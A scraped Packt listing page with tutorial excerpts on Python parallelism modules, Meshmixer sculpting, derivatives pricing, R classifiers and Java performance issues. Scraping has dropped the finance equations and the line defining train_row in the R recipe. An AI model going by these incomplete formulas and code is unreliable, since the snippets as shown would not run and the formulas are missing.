(For more resources related to this topic, see here.) The Python threading module The Python threading module offers a layer of abstraction to the module _thread, which is a lower-level module. It provides functions that help the programmer during the hard task of developing parallel systems based on threads. The threading module's official papers can be found at http://docs.python.org/3/library/threading.html?highlight=threading#module-threadin. The Python multiprocessing module The multiprocessing module aims at providing a simple API for the use of parallelism based on processes. This module is similar to the threading module, which simplifies alternations between the processes without major difficulties. The approach that is based on processes is very popular within the Python users' community as it is an alternative to answering questions on the use of CPU-Bound threads and GIL present in Python. The multiprocessing module's official papers can be found at http://docs.python.org/3/library/multiprocessing.html?highlight=multiprocessing#multiprocessing. The parallel Python module The parallel Python module is external and offers a rich API for the creation of parallel and distributed systems making use of the processes approach. This module promises to be light and easy to install, and integrates with other Python programs. The parallel Python module can be found at http://parallelpython.com. Among some of the features, we may highlight the following: Automatic detection of the optimal confi guration The fact that a number of worker processes can be changed during runtime Dynamic load balance Fault tolerance Auto-discovery of computational resources Celery – a distributed task queue Celery is an excellent Python module that's used to create distributed systems and has excellent documentation. It makes use of at least three different types of approach to run tasks in concurrent form—multiprocessing, Eventlet, and Gevent. This work will, however, concentrate efforts on the use of the multiprocessing approach. Also, the link between one and another is a configuration issue, and it remains as a study so that the reader is able to establish comparisons with his/her own experiments. The Celery module can be obtained on the official project page at http://celeryproject.org. Summary In this article, we had a short introduction to some Python modules, built-in and external, which makes a developer's life easier when building up parallel systems. Resources for Article: Further resources on this subject: Getting Started with Spring Python [Article] Python Testing: Installing the Robot Framework [Article] Getting Up and Running with MySQL for Python [Article]
Read more
  • 0
  • 0
  • 4787

article-image-shaping-model-meshmixer-and-printing-it
Packt
20 Jun 2014
4 min read
Save for later

Shaping a model with Meshmixer and printing it

Packt
20 Jun 2014
4 min read
(For more resources related to this topic, see here.) Shaping with Meshmixer Meshmixer was designed to provide a modeling interface that frees the user from working directly with the geometry of the mesh. In most cases, the intent of the program succeeds, but in some cases, it's good to see how the underlying mesh works. We'll use some brush tools to make our model better, thereby taking a look at how this affects the mesh structure. Getting ready We'll use a toy block scanned with 123D Catch. How to do it... We will proceed as follows: Let's take a look at the model's mesh by positioning the model with a visible large surface. Go to the menu and select View. Scroll down and select Toggle Wireframe (W). Choose Sculpt. From the pop-up toolbox, choose Brushes. Go to the menu and select ShrinkSmooth. Adjust your settings in the Properties section. Keep the size as 60 and its strength as 25. Use the smooth tool slowly across the model, watching the change it makes to the mesh. In the following example, the keyboard shortcut W is used to toggle between mesh views: Repeat using the RobustSmooth and Flatten brushes. Use these combinations of brushes to flatten one side of the toy block. Rotate your model to an area where there's heavy distortion. Make sure your view is in the wireframe mode. Go back to Brushes and select Pinch. Adjust the Strength to 85, Size to 39, Depth to -17, and Lazyness to 95. Keep everything else at default values. If you are uncertain of the default values, left-click on the small cogwheel icon next to the Properties heading. Choose Reset to Defaults. We're going to draw a line across a distorted area of the toy block to see how it affects the mesh. Using the pinch brush, draw a line across the model. Save your work and then select Undo/back from the Actions menu (Ctrl+ Z). Now, select your entire model. Go to the toolbox and select Edit. Scroll down and select Remesh (R). You'll see an even distribution of polygons in the mesh. Keep the defaults in the pop up and click on Accept. Now, go back and choose Clear Selection. Select the pinch brush again and draw a line across the model as you did before. Compare it to the other model with the unrefined mesh. Let's finish cleaning up the toy block. Click on Undo/back (Ctrl+ Z) to the pinch brush line that you drew. Now, use the pinch tool to refine the edges of the model. Work around it and sharpen all the edges. Finish smoothing the planes on the block and click on Save. We can see the results clearly as we compare the original toy block model to our modified model in the preceding image. How it works... Meshmixer works by using a mesh with a high definition of polygons. When a sculpting brush such as pinch is used to manipulate the surface, it rapidly increases the polygon count in the surrounding area. When the pinch tool crosses an area that has fewer and larger polygons, the interpolation of the area becomes distorted. We can see this in the following example when we compare the original and remeshed model in the wireframe view: In the following image, when we hide the wireframe, we can see how the distortion in the mesh has given the model on the left some undesirable texture along the pinch line: It may be a good idea to examine a model's mesh before sculpting it. Meshmixer works better with a dense polygon count that is consistent in size. By using the Remesh edit, a variety of mesh densities can be achieved by making changes in Properties. Experiment with the various settings and the sculpting brushes while in the wireframing stage. This will help you gain a better understanding of how mesh surface modeling works. Let's print! When we 3D print a model, we have the option of controlling how solid the interior will be and what kind of structure will fill it. How we choose between the options is easily determined by answering the following questions: Will it need to be structurally strong? If it's going to be used as a mechanical part or an item that will be heavily handled, then it does. Will it be a prototype? If it's a temporary object for examination purposes or strictly for display, then a fragile form may suffice. Depending on the use of a model, you'll have to decide how the object falls within these two extremes.
Read more
  • 0
  • 0
  • 11906

article-image-what-quantitative-finance
Packt
20 Jun 2014
11 min read
Save for later

What is Quantitative Finance?

Packt
20 Jun 2014
11 min read
(For more resources related to this topic, see here.) Discipline 1 – finance (financial derivatives) In general, a financial derivative is a contract between two parties who agree to exchange one or more cash flows in the future. The value of these cash flows depends on some future event, for example, that the value of some stock index or interest rate being above or below some predefined level. The activation or triggering of this future event thus depends on the behavior of a variable quantity known as the underlying. Financial derivatives receive their name because they derive their value from the behavior of another financial instrument. As such, financial derivatives do not have an intrinsic value in themselves (in contrast to bonds or stocks); their price depends entirely on the underlying. A critical feature of derivative contracts is thus that their future cash flows are probabilistic and not deterministic. The future cash flows in a derivative contract are contingent on some future event. That is why derivatives are also known as contingent claims. This feature makes these types of contracts difficult to price. The following are the most common types of financial derivatives: Futures Forwards Options Swaps Futures and forwards are financial contracts between two parties. One party agrees to buy the underlying from the other party at some predetermined date (the maturity date) for some predetermined price (the delivery price). An example could be a one-month forward contract on one ounce of silver. The underlying is the price of one ounce of silver. No exchange of cash flows occur at inception (today, t=0), but it occurs only at maturity (t=T). Here t represents the variable time. Forwards are contracts negotiated privately between two parties (in other words, Over The Counter (OTC)), while futures are negotiated at an exchange. Options are financial contracts between two parties. One party (called the holder of the option) pays a premium to the other party (called the writer of the option) in order to have the right, but not the obligation, to buy some particular asset (the underlying) for some particular price (the strike price) at some particular date in the future (the maturity date). This type of contract is called a European Call contract. Example 1 Consider a one-month call contract on the S&P 500 index. The underlying in this case will be the value of the S&P 500 index. There are cash flows both at inception (today, t=0) and at maturity (t=T). At inception, (t=0) the premium is paid, while at maturity (t=T), the holder of the option will choose between the following two possible scenarios, depending on the value of the underlying at maturity S(T): Scenario A: To exercise his/her right and buy the underlying asset for K Scenario B: To do nothing if the value of the underlying at maturity is below the value of the strike, that is, S(T)<K The option holder will choose Scenario A if the value of the underlying at maturity is above the value of the strike, that is, S(T)>K. This will guarantee him/her a profit of S(T)-K. The option holder will choose Scenario B if the value of the underlying at maturity is below the value of the strike, that is, S(T)<K. This will guarantee him/her to limit his/her losses to zero. Example 2 An Interest Rate Swap (IRS) is a financial contract between two parties A and B who agree to exchange cash flows at regular intervals during a given period of time (the life of a contract). Typically, the cash flows from A to B are indexed to a fixed rate of interest, while the cash flows from B to A are indexed to a floating interest rate. The set of fixed cash flows is known as the fixed leg, while the set of floating cash flows is known as the floating leg. The cash flows occur at regular intervals during the life of the contract between inception (t=0) and maturity (t=T). An example could be a fixed-for-floating IRS, who pays a rate of 5 percent on the agreed notional N every three months and receives EURIBOR3M on the agreed notional N every three months. Example 3 A futures contract on a stock index also involves a single future cash flow (the delivery price) to be paid at the maturity of the contract. However, the payoff in this case is uncertain because how much profit I will get from this operation will depend on the value of the underlying at maturity. If the price of the underlying is above the delivery price, then the payoff I get (denoted by function H) is positive (indicating a profit) and corresponds to the difference between the value of the underlying at maturity S(T) and the delivery price K. If the price of the underlying is below the delivery price, then the payoff I get is negative (indicating a loss) and corresponds to the difference between the delivery price K and the value of the underlying at maturity S(T). This characteristic can be summarized in the following payoff formula: Equation 1 Here, H(S(T)) is the payoff at maturity, which is a function of S(T). Financial derivatives are very important to the modern financial markets. According to the Bank of International Settlements (BIS) as of December 2012, the amounts outstanding for OTC derivative contracts worldwide were Foreign exchange derivatives with 67,358 billion USD, Interest Rate Derivatives with 489,703 billion USD, Equity-linked derivatives with 6,251 billion USD, Commodity derivatives with 2,587 billion USD, and Credit default swaps with 25,069 billion USD. For more information, see http://www.bis.org/statistics/dt1920a.pdf. Discipline 2 – mathematics We need mathematical models to capture both the future evolution of the underlying and the probabilistic nature of the contingent cash flows we encounter in financial derivatives. Regarding the contingent cash flows, these can be represented in terms of the payoff function H(S(T)) for the specific derivative we are considering. Because S(T) is a stochastic variable, the value of H(S(T)) ought to be computed as an expectation E[H(S(T))]. And in order to compute this expectation, we need techniques that allow us to predict or simulate the behavior of the underlying S(T) into the future, so as to be able to compute the value of ST and finally be able to compute the mean value of the payoff E[H(S(T))]. Regarding the behavior of the underlying, typically, this is formalized using Stochastic Differential Equations (SDEs), such as Geometric Brownian Motion (GBM), as follows: Equation 2 The previous equation fundamentally says that the change in a stock price (dS), can be understood as the sum of two effects—a deterministic effect (first term on the right-hand side) and a stochastic term (second term on the right-hand side). The parameter is called the drift, and the parameter is called the volatility. S is the stock price, dt is a small time interval, and dW is an increment in the Wiener process. This model is the most common model to describe the behavior of stocks, commodities, and foreign exchange. Other models exist, such as jump, local volatility, and stochastic volatility models that enhance the description of the dynamics of the underlying. Regarding the numerical methods, these correspond to ways in which the formal expression described in the mathematical model (usually in continuous time) is transformed into an approximate representation that can be used for calculation (usually in discrete time). This means that the SDE that describes the evolution of the price of some stock index into the future, such as the FTSE 100, is changed to describe the evolution at discrete intervals. An approximate representation of an SDE can be calculated using the Euler approximation as follows: Equation 3 The preceding equation needs to be solved in an iterative way for each time interval between now and the maturity of the contract. If these time intervals are days and the contract has a maturity of 30 days from now, then we compute tomorrow's price in terms of todays. Then we compute the day after tomorrow as a function of tomorrow's price and so on. In order to price the derivative, we require to compute the expected payoff E[H(ST)] at maturity and then discount it to the present. In this way, we would be able to compute what should be the fair premium associated with a European option contract with the help of the following equation: Equation 4 Discipline 3 – informatics (C++ programming) What is the role of C++ in pricing derivatives? Its role is fundamental. It allows us to implement the actual calculations that are required in order to solve the pricing problem. Using the preceding techniques to describe the dynamics of the underlying, we require to simulate many potential future scenarios describing its evolution. Say we ought to price a futures contract on the EUR/USD exchange rate with one year maturity. We have to simulate the future evolution of EUR/USD for each day for the next year (using equation 3). We can then compute the payoff at maturity (using equation 1). However, in order to compute the expected payoff (using equation 4), we need to simulate thousands of such possible evolutions via a technique known as Monte Carlo simulation. The set of steps required to complete this process is known as an algorithm. To price a derivative, we ought to construct such algorithm and then implement it in an advanced programming language such as C++. Of course C++ is not the only possible choice, other languages include Java, VBA, C#, Mathworks Matlab, and Wolfram Mathematica. However, C++ is an industry standard because it's flexible, fast, and portable. Also, through the years, several numerical libraries have been created to conduct complex numerical calculations in C++. Finally, C++ is a powerful modern object-oriented language. It is always difficult to strike a balance between clarity and efficiency. We have aimed at making computer programs that are self-contained (not too object oriented) and self-explanatory. More advanced implementations are certainly possible, particularly in the context of larger financial pricing libraries in a corporate context. In this article, all the programs are implemented with the newest standard C++11 using Code::Blocks (http://www.codeblocks.org) and MinGW (http://www.mingw.org). The Bento Box template A Bento Box is a single portion take-away meal common in Japanese cuisine. Usually, it has a rectangular form that is internally divided in compartments to accommodate the various types of portions that constitute a meal. In this article, we use the metaphor of the Bento Box to describe a visual template to facilitate, organize, and structure the solution of derivative problems. The Bento Box template is simply a form that we will fill sequentially with the different elements that we require to price derivatives in a logical structured manner. The Bento Box template when used to price a particular derivative is divided into four areas or boxes, each containing information critical for the solution of the problem. The following figure illustrates a generic template applicable to all derivatives: The Bento Box template – general case The following figure shows an example of the Bento Box template as applied to a simple European Call option: The Bento Box template – European Call option In the preceding figure, we have filled the various compartments, starting in the top-left box and proceeding clockwise. Each compartment contains the details about our specific problem, taking us in sequence from the conceptual (box 1: derivative contract) to the practical (box 4: algorithm), passing through the quantitative aspects required for the solution (box 2: mathematical model and box 3: numerical method). Summary This article gave an overview of the main elements of Quantitative Finance as applied to pricing financial derivatives. The Bento Box template technique will be used to organize our approach to solve problems in pricing financial derivatives. We will assume that we are in possession with enough information to fill box 1 (derivative contract). Resources for Article: Further resources on this subject: Application Development in Visual C++ - The Tetris Application [article] Getting Started with Code::Blocks [article] Creating and Utilizing Custom Entities [article]
Read more
  • 0
  • 0
  • 3915
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-machine-learning-bioinformatics
Packt
20 Jun 2014
8 min read
Save for later

Machine Learning in Bioinformatics

Packt
20 Jun 2014
8 min read
(For more resources related to this topic, see here.) Supervised learning for classification Like clustering, classification is also about categorizing data instances, but in this case, the categories are known and are termed as class labels. Thus, it aims at identifying the category that a new data point belongs to. It uses a dataset where the class labels are known to find the pattern. Classification is an instance of supervised learning where the learning algorithm takes a known set of input data and corresponding responses called class labels and builds a predictor model that generates reasonable predictions for the class labels in the unknown data. To illustrate, let's imagine that we have gene expression data from cancer patients as well as healthy patients. The gene expression pattern in these samples can define whether the patient has cancer or not. In this case, if we have a set of samples for which we know the type of tumor, the data can be used to learn a model that can identify the type of tumor. In simple terms, it is a predictive function used to determine the tumor type. Later, this model can be applied to predict the type of tumor in unknown cases. There are some do's and don'ts to keep in mind while learning a classifier. You need to make sure that you have enough data to learn the model. Learning with smaller datasets will not allow the model to learn the pattern in an unbiased manner and again, you will end up with an inaccurate classification. Furthermore, the preprocessing steps (such as normalization) for the training and test data should be the same. Another important thing that one should take care of is to keep the training and test data distinct. Learning on the entire data and then using a part of this data for testing will lead to a phenomenon called over fitting. It is always recommended that you take a look at it manually and understand the question that you need to answer via your classifier. There are several methods of classification. In this recipe, we will talk about some of these methods. We will discuss linear discriminant analysis (LDA), decision tree (DT), and support vector machine (SVM). Getting ready To perform the classification task, we need two preparations. First, a dataset with known class labels (training set), and second, the test data that the classifier has to be tested on (test set). Besides this, we will use some R packages, which will be discussed when required. As a dataset, we will use approximately 2300 gene from tumor cells. The data has ~83 data points with four different types of tumors. These will be used as our class labels. We will use 60 of the data points for the training and the remaining 23 for the test. To find out more about the dataset, refer to the Classification and diagnostic prediction of cancers using gene expression profiling and artificial neural networks article by Khan and others (http://research.nhgri.nih.gov/microarray/Supplement/). The set has been precompiled in a format that is readily usable in R and is available on the book's web page (code files) under the name cancer.rda. How to do it… To classify data points based on their features, perform the following steps: First, load the following MASS library as it has some of the classification functions: > library(MASS) Now, you need your data to learn and test the classifiers. Load the data from the code files available on the book's web page (cancer.rda) as follows: > load ("path/to/code/directory/cancer.rda") # located in the code file directory for the chapter, assign the path accordingly Randomly sample 60 data points for the training and the remaining 23 for the test set as follows—ensure that these two datasets do not overlap and are not biased towards any specific tumor type (random sampling): > train <- mldata[train_row,] # use sampled indexes to extract training data > test <- mldata[-train_row,] # test set is select by selecting all the other data points For the training data, retain the class labels, which are the tumor columns here, and remove this information from the test data. However, store this information for comparison purposes: > testClass <- test$tumor > test$tumor <- NULL Now, try the linear discriminate analysis classifier, as follows, to get the classifier model: > myLD <- lda(tumor ~ ., train) # might issue a warning Test this classifier to predict the labels on your test set, as follows: > testRes_lda <- predict(myLD, test) To check the number of correct and incorrect predictions, simply compare the predicted classes with the testClass object, which was created in step 4, as follows: > sum(testRes_lda$class == testClass) # correct prediction [1] 19 > sum(testRes_lda$class != testClass) # incorrect prediction [1] 4 Now, try another simple classifier called DT. For this, you need the rpart package: > library(rpart) Create the decision tree based on your training data, as follows: > myDT <- rpart(tumor~ ., data = train, control = rpart.control(minsplit = 10)) Plot your tree by typing the following commands, as shown in the next diagram: > plot(myDT) > text(myDT, use.n=T) The following screenshot shows the cut off for each feature (represented by the branches) to differentiate between the classes: The tree for DT-based learning Now, test the decision tree classifier on your test data using the following prediction function: > testRes_dt <- predict(myDT, newdata= test) Take a look at the species that each data instance is put in by the predicted classifier, as follows (1 if predicted in the class, else 0): > classes <- round(testRes_dt) > head(classes) BL EW NB RM 4 0 0 0 1 10 0 0 0 1 15 1 0 0 0 16 0 0 1 0 18 0 1 0 0 21 0 1 0 0 Finally, you'll work with SVMs. To be able to use them, you need another R package named e1071 as follows: > library(e1071) Create the svm classifier from the training data as follows: > mySVM <- svm(tumor ~ ., data = train) Then, use your classifier, the model (mySVM object) learned to predict for the test data. You will see the predicted labels for each instance as follows: > testRes_svm <- predict(mySVM, test) > testRes_svm How it works… We started our recipe by loading the input data on tumors. The supervised learning methods we saw in the recipe used two datasets: the training set and test set. The training set carries the class label information. The first part in most of the learning methods shown here, the training set is used to identify a pattern and model the pattern to find a distinction between the classes. This model is then applied on the test set that does not have the class label data to predict the class labels. To identify the training and test sets, we first randomly sample 60 indexes out of the entire data and use the remaining 23 for testing purposes. The supervised learning methods explained in this recipe follow a different principle. LDA attempts to model the difference between classes based on the linear combination of its features. This combination function forms the model based on the training set and is used to predict the classes in the test set. The LDA model trained on 60 samples is then used to predict for the remaining 23 cases. DT is, however, a different method. It forms regression trees that form a set of rules to distinguish one class from the other. The tree learned on a training set is applied to predict classes in test sets or other similar datasets. SVM is a relatively complex technique of classification. It aims to create a hyperplane(s) in the feature space, making the data points separable along these planes. This is done on a training set and is then used to assign classes to new data points. In general, LDA uses linear combination and SVM uses multiple dimensions as the hyperplane for data distinction. In this recipe, we used the svm functionality from the e1071 package, which has many other utilities for learning. We can compare the results obtained by the models we used in this recipe (they can be computed using the provided code on the book's web page). There's more... One of the most popular classifier tools in the machine learning community is WEKA. It is a Java-based tool and implements many libraries to perform classification tasks using DT, LDA, Random Forest, and so on. R supports an interface to the WEKA with a library named RWeka. It is available on the CRAN repository at http://cran.r-project.org/web/packages/RWeka/ . It uses RWekajars, a separate package, to use the Java libraries in it that implement different classifiers. See also The Elements of Statistical Learning book by Hastie, Tibshirani, and Friedman at http://statweb.stanford.edu/~tibs/ElemStatLearn/printings/ESLII_print10.pdf, which provides more information on LDA, DT, and SVM
Read more
  • 0
  • 0
  • 2642

article-image-common-performance-issues
Packt
19 Jun 2014
16 min read
Save for later

Common performance issues

Packt
19 Jun 2014
16 min read
(For more resources related to this topic, see here.) Threading performance issues Threading performance issues are the issues related to concurrency, as follows: Lack of threading or excessive threading Threads blocking up to starvation (usually from competing on shared resources) Deadlock until the complete application hangs (threads waiting for each other) Memory performance issues Memory performance issues are the issues that are related to application memory management, as follows: Memory leakage: This issue is an explicit leakage or implicit leakage as seen in improper hashing Improper caching: This issue is due to over caching, inadequate size of the object, or missing essential caching Insufficient memory allocation: This issue is due to missing JVM memory tuning Algorithmic performance issues Implementing the application logic requires two important parameters that are related to each other; correctness and optimization. If the logic is not optimized, we have algorithmic issues, as follows: Costive algorithmic logic Unnecessary logic Work as designed performance issues The work as designed performance issue is a group of issues related to the application design. The application behaves exactly as designed but if the design has issues, it will lead to performance issues. Some examples of performance issues are as follows: Using synchronous when asynchronous should be used Neglecting remoteness, that is, using remote calls as if they are local calls Improper loading technique, that is, eager versus lazy loading techniques Selection of the size of the object Excessive serialization layers Web services granularity Too much synchronization Non-scalable architecture, especially in the integration layer or middleware Saturated hardware on a shared infrastructure Interfacing performance issues Whenever the application is dealing with resources, we may face the following interfacing issues that could impact our application performance: Using an old driver/library Missing frequent database housekeeping Database issues, such as, missing database indexes Low performing JMS or integration service bus Logging issues (excessive logging or not following the best practices while logging) Network component issues, that is, load balancer, proxy, firewall, and so on Miscellaneous performance issues Miscellaneous performance issues include different performance issues, as follows: Inconsistent performance of application components, for example, having slow components can cause the whole application to slow down Introduced performance issues to delay the processing speed Improper configuration tuning of different components, for example, JVM, application server, and so on Application-specific performance issues, such as excessive validations, apply many business rules, and so on Fake performance issues Fake performance issues could be a temporary issue or not even an issue. The famous examples are as follows: Networking temporary issues Scheduled running jobs (detected from the associated pattern) Software automatic updates (it must be disabled in production) Non-reproducible issues In the following sections, we will go through some of the listed issues. Threading performance issues Multithreading has the advantage of maximizing the hardware utilization. In particular, it maximizes the processing power by executing multiple tasks concurrently. But it has different side effects, especially if not used wisely inside the application. For example, in order to distribute tasks among different concurrent threads, there should be no or minimal data dependency, so each thread can complete its task without waiting for other threads to finish. Also, they shouldn't compete over different shared resources or they will be blocked, waiting for each other. We will discuss some of the common threading issues in the next section. Blocking threads A common issue where threads are blocked is waiting to obtain the monitor(s) of certain shared resources (objects), that is, holding by other threads. If most of the application server threads are consumed in a certain blocked status, the application becomes gradually unresponsive to user requests. In the Weblogic application server, if a thread keeps executing for more than a configurable period of time (not idle), it gets promoted to the Stuck thread. The more the threads are in the stuck status, the more the server status becomes critical. Configuring the stuck thread parameters is part of the Weblogic performance tuning. Performance symptoms The following symptoms are the performance symptoms that usually appear in cases of thread blocking: Slow application response (increased single request latency and pending user requests) Application server logs might show some stuck threads. The server's healthy status becomes critical on monitoring tools (application server console or different monitoring tools) Frequent application server restarts either manually or automatically Thread dump shows a lot of threads in the blocked status waiting for different resources Application profiling shows a lot of thread blocking An example of thread blocking To understand the effect of thread blocking on application execution, open the HighCPU project and measure the time it takes for execution by adding the following additional lines: long start= new Date().getTime(); .. .. long duration= new Date().getTime()-start; System.err.println("total time = "+duration); Now, try to execute the code with a different number of the thread pool size. We can try using the thread pool size as 50 and 5, and compare the results. In our results, the execution of the application with 5 threads is much faster than 50 threads! Let's now compare the NetBeans profiling results of both the executions to understand the reason behind this unexpected difference. The following screenshot shows the profiling of 50 threads; we can see a lot of blocking for the monitor in the column and the percentage of Monitor to the left waiting around at 75 percent: To get the preceding profiling screen, click on the Profile menu inside NetBeans, and then click on Profile Project (HighCPU). From the pop-up options, select Monitor and check all the available options, and then click on Run. The following screenshot shows the profiling of 5 threads, where there is almost no blocking, that is, less threads compete on these resources: Try to remove the System.out statement from inside the run() method, re-execute the tests, and compare the results. Another factor that also affects the selection of the pool size, especially when the thread execution takes long time, is the context switching overhead. This overhead requires the selection of the optimal pool size, usually related to the number of available processors for our application. Context switching is the CPU switching from one process (or thread) to another, which requires restoration of the execution data (different CPU registers and program counters). The context switching includes suspension of the current executing process, storing its current data, picking up the next process for execution according to its priority, and restoring its data. Although it's supported on the hardware level and is faster, most operating systems do this on the level of software context switching to improve the performance. The main reason behind this is the ability of the software context switching to selectively choose the required registers to save. Thread deadlock When many threads hold the monitor for objects that they need, this will result in a deadlock unless the implementation uses the new explicit Lock interface. In the example, we had a deadlock caused by two different threads waiting to obtain the monitor that the other thread held. The thread profiling will show these threads in a continuous blocking status, waiting for the monitors. All threads that go into the deadlock status become out of service for the user's requests, as shown in the following screenshot: Usually, this happens if the order of obtaining the locks is not planned. For example, if we need to have a quick and easy fix for a multidirectional thread deadlock, we can always lock the smallest or the largest bank account first, regardless of the transfer direction. This will prevent any deadlock from happening in our simple two-threaded mode. But if we have more threads, we need to have a much more mature way to handle this by using the Lock interface or some other technique. Memory performance issues In spite of all this great effort put into the allocated and free memory in an optimized way, we still see memory issues in Java Enterprise applications mainly due to the way people are dealing with memory in these applications. We will discuss mainly three types of memory issues: memory leakage, memory allocation, and application data caching. Memory leakage Memory leakage is a common performance issue where the garbage collector is not at fault; it is mainly the design/coding issues where the object is no longer required but it remains referenced in the heap, so the garbage collector can't reclaim its space. If this is repeated with different objects over a long period (according to object size and involved scenarios), it may lead to an out of memory error. The most common example of memory leakage is adding objects to the static collections (or an instance collection of long living objects, such as a servlet) and forgetting to clean collections totally or partially. Performance symptoms The following symptoms are some of the expected performance symptoms during a memory leakage in our application: The application uses heap memory increased by time The response slows down gradually due to memory congestion OutOfMemoryError occurs frequently in the logs and sometimes an application server restart is required Aggressive execution of garbage collection activities Heap dump shows a lot of objects retained (from the leakage types) A sudden increase of memory paging as reported by the operating system monitoring tools An example of memory leakage We have a sample application ExampleTwo; this is a product catalog where users can select products and add them to the basket. The application is written in spaghetti code, so it has a lot of issues, including bad design, improper object scopes, bad caching, and memory leakage. The following screenshot shows the product catalog browser page: One of the bad issues is the usage of the servlet instance (or static members), as it causes a lot of issues in multiple threads and has a common location for unnoticed memory leakages. We have added the following instance variable as a leakage location: private final HashMap<String, HashMap> cachingAllUsersCollection = new HashMap(); We will add some collections to the preceding code to cause memory leakage. We also used the caching in the session scope, which causes implicit leakage. The session scope leakage is difficult to diagnose, as it follows the session life cycle. Once the session is destroyed, the leakage stops, so we can say it is less severe but more difficult to catch. Adding global elements, such as a catalog or stock levels, to the session scope has no meaning. The session scope should only be restricted to the user-specific data. Also, forgetting to remove data that is not required from a session makes the memory utilization worse. Refer to the following code: @Stateful public class CacheSessionBean Instead of using a singleton class here or stateless bean with a static member, we used the Stateful bean, so it is instantiated per user session. We used JPA beans in the application layers instead of using View Objects. We also used loops over collections instead of querying or retrieving the required object directly, and so on. It would be good to troubleshoot this application with different profiling aspects to fix all these issues. All these factors are enough to describe such a project as spaghetti. We can use our knowledge in Apache JMeter to develop simple testing scenarios. As shown in the following screenshot, the scenario consists of catalog navigations and details of adding some products to the basket: Executing the test plan using many concurrent users over many iterations will show the bad behavior of our application, where the used memory is increased by time. There is no justification as the catalog is the same for all users and there's no specific user data, except for the IDs of the selected products. Actually, it needs to be saved inside the user session, which won't take any remarkable memory space. In our example, we intend to save a lot of objects in the session, implement a wrong session level, cache, and implement meaningless servlet level caching. All this will contribute to memory leakage. This gradual increase in the memory consumption is what we need to spot in our environment as early as possible (as we can see in the following screenshot, the memory consumption in our application is approaching 200 MB!): Improper data caching Caching is one of the critical components in the enterprise application architecture. It increases the application performance by decreasing the time required to query the object again from its data store, but it also complicates the application design and causes a lot of other secondary issues. The main concerns in the cache implementation are caching refresh rate, caching invalidation policy, data inconsistency in a distributed environment, locking issues while waiting to obtain the cached object's lock, and so on. Improper caching issue types The improper caching issue can take a lot of different variants. We will pick some of them and discuss them in the following sections. No caching (disabled caching) Disabled caching will definitely cause a big load over the interfacing resources (for example, database) by hitting it in with almost every interaction. This should be avoided while designing an enterprise application; otherwise; the application won't be usable. Fortunately, this has less impact than using wrong caching implementation! Most of the application components such as database, JPA, and application servers already have an out-of-the-box caching support. Too small caching size Too small caching size is a common performance issue, where the cache size is initially determined but doesn't get reviewed with the increase of the application data. The cache sizing is affected by many factors such as the memory size. If it allows more caching and the type of the data, lookup data should be cached entirely when possible, while transactional data shouldn't be cached unless required under a very strict locking mechanism. Also, the cache replacement policy and invalidation play an important role and should be tailored according to the application's needs, for example, least frequently used, least recently used, most frequently used, and so on. As a general rule, the bigger the cache size, the higher the cache hit rate and the lower the cache miss ratio. Also, the proper replacement policy contributes here; if we are working—as in our example—on an online product catalog, we may use the least recently used policy so all the old products will be removed, which makes sense as the users usually look for the new products. Monitoring of the caching utilization periodically is an essential proactive measure to catch any deviations early and adjust the cache size according to the monitoring results. For example, if the cache saturation is more than 90 percent and the missed cache ratio is high, a cache resizing is required. Missed cache hits are very costive as they hit the cache first and then the resource itself (for example, database) to get the required object, and then add this loaded object into the cache again by releasing another object (if the cache is 100 percent), according to the used cache replacement policy. Too big caching size Too big caching size might cause memory issues. If there is no control over the cache size and it keeps growing, and if it is a Java cache, the garbage collector will consume a lot of time trying to garbage collect that huge memory, aiming to free some memory. This will increase the garbage collection pause time and decrease the cache throughput. If the cache throughput is decreased, the latency to get objects from the cache will increase causing the cache retrieval cost to be high to the level it might be slower than hitting the actual resources (for example, database). Using the wrong caching policy Each application's cache implementation should be tailored according to the application's needs and data types (transactional versus lookup data). If the selection of the caching policy is wrong, the cache will affect the application performance rather than improving it. Performance symptoms According to the cache issue type and different cache configurations, we will see the following symptoms: Decreased cache hit rate (and increased cache missed ratio) Increased cache loading because of the improper size Increased cache latency with a huge caching size Spiky pattern in the performance testing response time, in case the cache size is not correct, causes continuous invalidation and reloading of the cached objects An example of improper caching techniques In our example, ExampleTwo, we have demonstrated many caching issues, such as no policy defined, global cache is wrong, local cache is improper, and no cache invalidation is implemented. So, we can have stale objects inside the cache. Cache invalidation is the process of refreshing or updating the existing object inside the cache or simply removing it from the cache. So in the next load, it reflects its recent values. This is to keep the cached objects always updated. Cache hit rate is the rate or ratio in which cache hits match (finds) the required cached object. It is the main measure for cache effectiveness together with the retrieval cost. Cache miss rate is the rate or ratio at which the cache hits the required object that is not found in the cache. Last access time is the timestamp of the last access (successful hit) to the cached objects. Caching replacement policies or algorithms are algorithms implemented by a cache to replace the existing cached objects with other new objects when there are no rooms available for any additional objects. This follows missed cache hits for these objects. Some examples of these policies are as follows: First-in-first-out (FIFO): In this policy, the cached object is aged and the oldest object is removed in favor of the new added ones. Least frequently used (LFU): In this policy, the cache picks the less frequently used object to free the memory, which means the cache will record statistics against each cached object. Least recently used (LRU): In this policy, the cache replaces the least recently accessed or used items; this means the cache will keep information like the last access time of all cached objects. Most recently used (MRU): This policy is the opposite of the previous one; it removes the most recently used items. This policy fits the application where items are no longer needed after the access, such as used exam vouchers. Aging policy: Every object in the cache will have an age limit, and once it exceeds this limit, it will be removed from the cache in the simple type. In the advanced type, it will also consider the invalidation of the cache according to predefined configuration rules, for example, every three hours, and so on. It is important for us to understand that caching is not our magic bullet and it has a lot of related issues and drawbacks. Sometimes, it causes overhead if not correctly tailored according to real application needs.
Read more
  • 0
  • 0
  • 8988

article-image-getting-started-mockito
Packt
19 Jun 2014
14 min read
Save for later

Getting Started with Mockito

Packt
19 Jun 2014
14 min read
